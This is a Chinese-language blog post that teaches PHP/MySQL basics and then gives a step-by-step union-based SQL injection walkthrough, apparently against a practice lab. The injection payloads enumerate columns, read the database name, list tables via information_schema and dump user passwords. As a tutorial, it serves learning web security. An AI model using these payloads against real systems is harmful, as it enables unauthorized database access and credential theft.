<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>PHP language | Hexo</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="#一、PHP语言基础 ##1、PHP 脚本以 &amp;lt;?php 开头，以 ?&amp;gt; 结尾，PHP 文件的默认文件扩展名是 “.php”，PHP 语句以分号结尾（;），PHP 函数 “echo” 的作用是在网页上输出文本 。（在网站根目录下建立）">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP language">
<meta property="og:url" content="http://yoursite.com/2018/07/02/PHP-language/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="#一、PHP语言基础 ##1、PHP 脚本以 &amp;lt;?php 开头，以 ?&amp;gt; 结尾，PHP 文件的默认文件扩展名是 “.php”，PHP 语句以分号结尾（;），PHP 函数 “echo” 的作用是在网页上输出文本 。（在网站根目录下建立）">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.imgur.com/qvDlUXx.png">
<meta property="og:image" content="https://i.imgur.com/FAmfpSW.png">
<meta property="og:image" content="https://i.imgur.com/x2ZZlDF.jpg">
<meta property="og:image" content="https://i.imgur.com/SZUUtuo.jpg">
<meta property="og:image" content="https://i.imgur.com/SNoymJ8.png">
<meta property="og:image" content="https://i.imgur.com/qViuEPZ.png">
<meta property="og:image" content="https://i.imgur.com/FZl462C.jpg">
<meta property="og:updated_time" content="2018-07-02T16:43:25.535Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP language">
<meta name="twitter:description" content="#一、PHP语言基础 ##1、PHP 脚本以 &amp;lt;?php 开头，以 ?&amp;gt; 结尾，PHP 文件的默认文件扩展名是 “.php”，PHP 语句以分号结尾（;），PHP 函数 “echo” 的作用是在网页上输出文本 。（在网站根目录下建立）">
<meta name="twitter:image" content="https://i.imgur.com/qvDlUXx.png">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">paradise</h5>
          <a href="mailto:1194326468@qq.com" title="1194326468@qq.com" class="mail">1194326468@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/yscoder" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="http://www.weibo.com/ysweb" target="_blank" >
                <i class="icon icon-lg icon-weibo"></i>
                Weibo
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/custom"  >
                <i class="icon icon-lg icon-link"></i>
                测试
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">PHP language</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="検索">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">PHP language</h1>
        <h5 class="subtitle">
            
                <time datetime="2018-07-02T09:03:14.000Z" itemprop="datePublished" class="page-time">
  2018-07-02
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    

<article id="post-PHP-language"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">PHP language</h1>
        <div class="post-meta">
            <time class="post-time" title="2018-07-02 17:03:14" datetime="2018-07-02T09:03:14.000Z"  itemprop="datePublished">2018-07-02</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <p>#一、PHP语言基础</p>
<p>##1、PHP 脚本以 &lt;?php 开头，以 ?&gt; 结尾，PHP 文件的默认文件扩展名是 “.php”，PHP 语句以分号结尾（;），PHP 函数 “echo” 的作用是在网页上输出文本 。（在网站根目录下建立）<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/qvDlUXx.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure><br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/FAmfpSW.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure></p>
<p>##2、PHP基本语法：<br>（1）三种注释的区别<br><br>(2)变量规则<br><br>(3）单双引号区别<br><br>(4)循环语句（与C语言一致）<br><br>(5)索引数组，关联数组<br><br>(6)三层构架中的信息流<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/x2ZZlDF.jpg" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure></p>
<p>##3、URL （统一资源定位符）<br>作用：提供资源（通常是文档）的路径或位置<br><br>结构：协议://授权/路径?查询<br><br>例子：<a href="http://www.cobranet.org/about.php?id=1" target="_blank" rel="noopener">http://www.cobranet.org/about.php?id=1</a></p>
<p>##4、GET请求和 POST请求<br>GET和POST是HTTP中定义的客户端可以发送给服务器的两种操作<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/SZUUtuo.jpg" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure><br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/SNoymJ8.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure><br>通过get方法传递参数，注意id参数值，数字和字符串的输出结果，变量$id也可以取其它名字.<br><br>但访问的时候要保持URL中？后面参数的名字与变量名一致。</p>
<p>##5、PHP连接到一个 MySQL 数据库，通过 mysql_connect() 函数完成<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/qViuEPZ.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure></p>
<p>##6、PHP从数据库中选取数据，通过 SELECT语句完成<br>    select column_name(s) form table_name</p>
<p>##7、完整的sql注入测试页面<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://i.imgur.com/FZl462C.jpg" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure></p>
<p>#二、mysql</p>
<p>##1、如何在众多数据库中定义到一条数据？<br>首先是数据库<br><br>然后是数据表<br><br>最后根据字段确定数据</p>
<p>##2、连接符操作<br>在一个SQL语句里用多个不同的操作符进行多种比较，常用于  WHERE子句中。<br><br>AND：所有由AND连接的条件都为TRUE，SQL语句才会执行<br><br>OR：只要OR连接的条件里有一个是TRUE，SQL语句就会执行(永真式)</p>
<p>#三、准备注入的基本知识</p>
<p>##1、附加命令：<br>union select :联合查询，即前一条查询语句失败后执行后一条语句。<br> <br>   Select * from users where id=-1 union select 1,2,3;<br><br>group by:后接数字，表示按照第几列进行排序。<br><br>group_concat:将查询结果以一行的形式输出</p>
<p>##2、数字型：<br>如果数据库查询语句如下:<br><br>Select <em> from users where id=$id;<br><br>用户的输入是如果是:id=-1 or 1=1<br><br>此时构造出来的查询语句为：<br><br>Select </em> from users where id=-1 or 1=1;<br><br>此时where的判断条件恒真</p>
<p>##3、字符型：<br>如果数据库查询语句如下:<br><br>Select <em> from users where id=‘$id’;<br><br>用户的输入是如果是:id=-1 or 1=1<br><br>此时构造出来的查询语句为：<br><br>Select </em> from users where id=‘-1 or 1=1’;<br><br>可是如果用户输入是:id=-1‘ or ‘1’=‘1<br><br>此时查询语句为：<br><br>Select * from users where id=‘-1’ or ‘1’=‘1’;</p>
<p>#四、手动注入</p>
<p>##1、判断是否存在注入，注入是字符型还是数字型<br>输入1，查询成功：<br><br>输入1’ and ‘1’ =’2，查询失败，返回结果为空：<br><br>输入1’or ‘1 ’=’1，查询成功：<br><br>返回了多个结果，说明存在字符型注入</p>
<p>##2、猜解SQL查询语句中的字段数<br>输入1’ or 1=1 order by 1 #，查询成功<br><br>输入1’ or 1=1 order by 2 #，查询成功<br><br>输入1’ or 1=1 order by 3 #，查询失败<br><br>注意：说明执行的SQL查询语句中只有两个字段，即这里的First name、Surname。<br>（这里也可以通过输入union select 1,2,3…来猜解字段数）</p>
<p>##3、确定显示的字段顺序<br>输入1’union select 1,2 #，查询成功</p>
<p>##4、获取当前数据库<br>输入1′ union select 1,database() #，查询成功<br><br>对应Surname为当前数据库名</p>
<p>##5、获取数据库中的表<br>输入1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，查询成功<br><br>Information_schema.tables:包含所有数据表名<br><br>Information_schema.columns:包含所有字段</p>
<p><br>其中table_schema字段表示数据库名<br><br>table_name字段表示数据表名<br><br>column_name字段表示列名</p>
<p>##6、获取表中的字段名<br>输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #，查询成功</p>
<p>##7、下载数据<br>输入1′ or 1=1 union select group_concat(id,first_name,last_name),group_concat(password) from users #，查询成功</p>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最終更新：<time datetime="2018-07-02T16:43:25.535Z" itemprop="dateUpdated">2018-07-03 00:43:25</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2018/07/02/PHP-language/" target="_blank" rel="external">http://yoursite.com/2018/07/02/PHP-language/</a>
        
    </div>
    
    <footer>
        <a href="http://yoursite.com">
            <img src="/img/avatar.jpg" alt="paradise">
            paradise
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            

            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://yoursite.com/2018/07/02/PHP-language/&title=《PHP language》 — Hexo&pic=http://yoursite.com/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://yoursite.com/2018/07/02/PHP-language/&title=《PHP language》 — Hexo&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://yoursite.com/2018/07/02/PHP-language/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《PHP language》 — Hexo&url=http://yoursite.com/2018/07/02/PHP-language/&via=http://yoursite.com" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://yoursite.com/2018/07/02/PHP-language/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2018/07/03/basic/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">basic</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2018/07/02/Password-blasting/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">Password blasting</h4>
      </a>
    </div>
  
</nav>



    

















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        谢谢大爷~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/wechat.jpg" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/wechat.jpg" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>このブログの内容物は<a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.ja">クリエイティブ・コモンズ 表示 - 非営利 - 継承 4.0 国際ライセンスの下に提供されています</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span>paradise &copy; 2015 - 2018</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://yoursite.com/2018/07/02/PHP-language/&title=《PHP language》 — Hexo&pic=http://yoursite.com/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://yoursite.com/2018/07/02/PHP-language/&title=《PHP language》 — Hexo&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://yoursite.com/2018/07/02/PHP-language/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《PHP language》 — Hexo&url=http://yoursite.com/2018/07/02/PHP-language/&via=http://yoursite.com" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://yoursite.com/2018/07/02/PHP-language/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://yoursite.com/2018/07/02/PHP-language/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
